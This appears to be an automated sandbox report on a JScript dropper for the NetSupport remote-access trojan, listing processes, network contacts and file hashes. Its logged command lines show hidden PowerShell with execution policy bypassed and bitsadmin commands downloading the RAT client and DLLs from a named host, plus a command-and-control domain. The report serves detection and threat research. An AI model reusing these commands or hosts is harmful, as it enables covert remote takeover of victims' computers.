Malware Analysis Report

2025-04-13 09:51

Sample ID 230709-x1s7eagc3y
Target ave6119jsjsjsjsjsjsjsjsjs.js
SHA256 c4a3d1cec5bac2e0f1eb4671633ee0650b07831004130bd1d76c503655d2d26f
Tags
netsupport rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c4a3d1cec5bac2e0f1eb4671633ee0650b07831004130bd1d76c503655d2d26f

Threat Level: Known bad

The file ave6119jsjsjsjsjsjsjsjsjs.js was found to be: Known bad.

Malicious Activity Summary

netsupport rat

NetSupport

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Enumerates physical storage devices

Download via BitsAdmin

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-09 19:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-09 19:19

Reported

2023-07-09 19:22

Platform

win7-20230703-en

Max time kernel

75s

Max time network

79s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js

Signatures

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 784 wrote to memory of 2336 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 784 wrote to memory of 2336 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 784 wrote to memory of 2336 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2336 wrote to memory of 2380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 2380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 2380 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 2032 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 1760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 1760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 1760 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 2512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 2512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 2512 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 2216 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 2216 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 2216 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 1752 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 1752 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe
PID 2336 wrote to memory of 1752 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\bitsadmin.exe

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\cv3ibkm.ps1

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.exe C:\Users\Admin\AppData\RoamingOfficeStartupclient32.exe

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/client32.ini C:\Users\Admin\AppData\RoamingOfficeStartupclient32.ini

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/HTCTL32.DLL C:\Users\Admin\AppData\RoamingOfficeStartupHTCTL32.DLL

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/msvcr100.dll C:\Users\Admin\AppData\RoamingOfficeStartupmsvcr100.dll

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/nskbfltr.inf C:\Users\Admin\AppData\RoamingOfficeStartupnskbfltr.inf

Network

Country Destination Domain Proto
US 8.8.8.8:53 virvatulishop.com udp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
FI 5.44.245.24:443 virvatulishop.com tcp
US 192.229.211.108:80 tcp

Files

memory/2336-60-0x000000001B370000-0x000000001B652000-memory.dmp

memory/2336-61-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cv3ibkm.ps1

MD5 7269a83e127ff320b1f8810b6623ee98
SHA1 52d53be0e3bf58d1a330f24f7a4f1f6ee543b4a2
SHA256 9bb8941997354717115d7d57f559b16a5d4be037843cd2403ce16e61add7d404
SHA512 3bb453737c33a01ea10d365b93685a0d53d7a396d0d1a46466a08388acc49e662fd25300e36695466690cbf9198df9bb50dc1dd0ac6bf92aa7e37ca5152e9877

memory/2336-63-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2336-64-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2336-65-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2336-66-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2336-67-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2336-68-0x0000000002920000-0x00000000029A0000-memory.dmp

memory/2336-69-0x0000000002920000-0x00000000029A0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-09 19:19

Reported

2023-07-09 19:22

Platform

win10v2004-20230703-en

Max time kernel

143s

Max time network

151s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js

Signatures

NetSupport

rat netsupport

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1420546310-613437930-2990200354-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave6119jsjsjsjsjsjsjsjsjs.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\i5e0n45.ps1

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

"C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 126.133.255.8.in-addr.arpa udp
US 8.8.8.8:53 198.209.218.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 virvatulishop.com udp
FI 5.44.245.24:443 virvatulishop.com tcp
US 8.8.8.8:53 24.245.44.5.in-addr.arpa udp
US 8.8.8.8:53 deperekanuki1.com udp
RU 5.42.74.53:5222 deperekanuki1.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 8.8.8.8:53 53.74.42.5.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 51.142.119.24:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 24.119.142.51.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

memory/2660-142-0x0000027A64400000-0x0000027A64422000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1mdb2oz.yys.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\i5e0n45.ps1

MD5 5147a0d331648239ca26cbec34e9e166
SHA1 cf1616c225da3983a31378a176356d434f7b89ea
SHA256 0de826ed5b7c41eec6d359a8b560ba8df6d957da91452f1bb9e47119f0d3de58
SHA512 067164752f00e9d5fdcbb6c1d7952c9fd8be0586db983c395536973507dea07e49c826683ffe97aa54c9a5b4257ab95002949a2332638cf25108e0cba2290629

memory/2660-149-0x0000027A63ED0000-0x0000027A63EE0000-memory.dmp

memory/2660-148-0x0000027A63ED0000-0x0000027A63EE0000-memory.dmp

memory/2660-150-0x0000027A7EB40000-0x0000027A7EB54000-memory.dmp

memory/2660-151-0x0000027A7EB60000-0x0000027A7EB72000-memory.dmp

memory/2660-152-0x0000027A7EB30000-0x0000027A7EB3A000-memory.dmp

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

memory/2660-188-0x0000027A63ED0000-0x0000027A63EE0000-memory.dmp

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.dll

MD5 9c9302e75c25c2ba996efd89a1047205
SHA1 9e79627ff32d5abd3382b65a509baeb31c78a7f2
SHA256 beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1
SHA512 d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.DLL

MD5 9c9302e75c25c2ba996efd89a1047205
SHA1 9e79627ff32d5abd3382b65a509baeb31c78a7f2
SHA256 beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1
SHA512 d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1

C:\Users\Admin\AppData\RoamingOfficeStartup\pcichek.dll

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICHEK.DLL

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\RoamingOfficeStartup\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\NSM.LIC

MD5 b9956282a0fed076ed083892e498ac69
SHA1 d14a665438385203283030a189ff6c5e7c4bf518
SHA256 fcc6afd664a8045bd61c398be3c37a97536a199a48d277e11977f93868ae1acc
SHA512 7daa09113c0e8a36c91cc6d657c65851a20dff6b60ac3d2f40c5737c12c1613c553955f84d131ba2139959973fef9fc616ca5e968cb16c25acf2d4739eed87eb

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.ini

MD5 a252f22f61f960c54fa32ae0de7dd17c
SHA1 00fe1097e70f1f6307e6bc68f40d49abb01dd2d5
SHA256 a5be7a73bbed8ec4e1a7819289da5412fe9ddf628941aa3b35fbe7454f148618
SHA512 7998e6cd43853b77e38cfedf0b6081c2965c9facb891ebd9a33db0e39b71d683f218174d87f99d5ab22983632c4c319bd63ec9dcbf1cbc81a77e3053ae3f1593

C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a